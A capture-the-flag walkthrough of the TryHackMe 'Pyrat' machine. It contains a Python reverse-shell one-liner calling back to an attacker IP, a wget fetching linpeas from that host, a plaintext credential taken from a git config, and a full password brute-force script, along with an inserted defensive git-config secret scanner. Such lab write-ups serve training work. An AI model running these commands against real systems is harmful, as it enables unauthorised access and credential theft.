TryHackMe-Pyrat

nmap -sC -sV -oN 1.txt 10.10.182.195

The scan shows port 8000 open; visiting it returns the hint

Try a more basic connection

Huh? A "more basic" connection? How do I connect to that... nc.

Try nc.

Run a reverse shell command:

import socket,os,pty;s=socket.socket();s.connect(("10.23.102.205",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")

What comes back is plain sh, so switch to an interactive shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Looking around, there is a user directory think under home, but we have no permission to read it, so run linpeas.sh:

cd /tmp
wget http://10.23.102.205:8080/linpeas.sh
chmod +x linpeas.sh


Go into opt/dev/.git.

Inspecting the config file reveals the password used for the SSH login:


[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
[user]
	name = Jose Mario
	email = josemlwdf@github.com

[credential]
	helper = cache --timeout=3600

[credential "https://github.com"]
	username = think
	password = _TH1NKINGPirate$_
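The leak above (a plaintext `password` under `[credential "https://github.com"]` plus a credential cache kept for 3600 seconds) is exactly what a secret scan over checked-out repositories should catch before anyone else reads the file. The following is an added example, not code from the original writeup: a small parser for git's config format together with a check that flags such settings, extended beyond this box to credentials embedded in a remote URL; the sample config is constructed and its secret values are placeholders.

```python
import re

# Constructed sample modelled on the .git/config found under opt/dev on the box;
# the secret values are placeholders, not the ones from the machine.
SAMPLE_GIT_CONFIG = """\
[credential]
	helper = cache --timeout=3600
[credential "https://github.com"]
	username = think
	password = PLACEHOLDER_SECRET
[remote "origin"]
	url = https://think:PLACEHOLDER_TOKEN@github.com/example/repo.git
"""
SECTION_RE = re.compile(r'^\[([^\s"\]]+)(?:\s+"([^"]*)")?\]$')
URL_CRED_RE = re.compile(r"^[a-z][a-z0-9+.-]*://[^/@\s]+:[^/@\s]+@", re.I)
SECRET_KEYS = {"password", "passwd", "token", "oauth-token"}

def parse_git_config(text: str) -> dict[str, dict[str, str]]:
    """Parse git's INI-like config into {'section' or 'section.subsection': {key: value}}."""
    sections: dict[str, dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":  # blank lines and comments
            continue
        m = SECTION_RE.match(line)
        if m:
            current = f"{m.group(1).lower()}.{m.group(2)}" if m.group(2) else m.group(1).lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip().lower()] = value.strip()
    return sections

def find_credential_findings(config: dict[str, dict[str, str]]) -> list[tuple[str, str]]:
    """Return (section, reason) for each setting that leaves a secret readable by a local file reader."""
    findings = []
    for section, kv in config.items():
        findings += [(section, f"plaintext '{k}' in config") for k in kv if k in SECRET_KEYS]
        helper = kv.get("helper", "") if section.startswith("credential") else ""
        m = re.search(r"--timeout[= ](\d+)", helper)
        if helper.startswith("cache") and m and int(m.group(1)) > 900:  # 900 s is git's default
            findings.append((section, f"cache timeout {m.group(1)}s exceeds the 900 s default"))
        if URL_CRED_RE.match(kv.get("url", "")):
            findings.append((section, "remote URL embeds user:password"))
    return findings

for _section, _reason in find_credential_findings(parse_git_config(SAMPLE_GIT_CONFIG)):
    print(f"{_section}: {_reason}")
```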

Tried switching user with it, but that failed.


Let's try connecting over SSH instead:

ssh think@10.10.222.124


996bdb1f619a68361417cabca5454705

git show

The history contains a script; it looks like the one that runs the service in this environment.


It handles certain keywords specially; after connecting with nc, sending the right one should give root privileges.

import socket

# Configuration
target_ip = "10.10.222.124"  # Target IP
target_port = 8000  # Target port
password_wordlist = "/usr/share/wordlists/rockyou.txt"  # Path to the password wordlist file


def connect_and_send_password(password):
    client_socket = None  # keeps the finally block safe if socket creation fails
    try:
        client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        client_socket.connect((target_ip, target_port))
        client_socket.sendall(b'admin\n')

        response = client_socket.recv(1024).decode()
        print(f"Server response after sending 'admin': {response}")

        if "Password:" in response:
            print(f"Trying password: {password}")
            client_socket.sendall(password.encode() + b"\n")

            response = client_socket.recv(1024).decode()

            if "success" in response.lower() or "admin" in response.lower():
                print(f"Server response for password '{password}': {response}")
                return True
            else:
                print(f"Password '{password}' is incorrect or no response.")

        return False

    except Exception as e:
        print(f"Error: {e}")
        return False

    finally:
        if client_socket is not None:
            client_socket.close()


def fuzz_passwords():
    # latin-1: rockyou.txt contains bytes that are not valid UTF-8
    with open(password_wordlist, "r", encoding="latin-1") as file:
        passwords = file.readlines()

    for password in passwords:
        password = password.strip()  # Remove any newline characters

        if connect_and_send_password(password):
            print(f"Correct password found: {password}")
            break
        else:
            print(f"Password {password} was incorrect. Reconnecting...")


if __name__ == "__main__":
    fuzz_passwords()

The password turns out to be abc123.
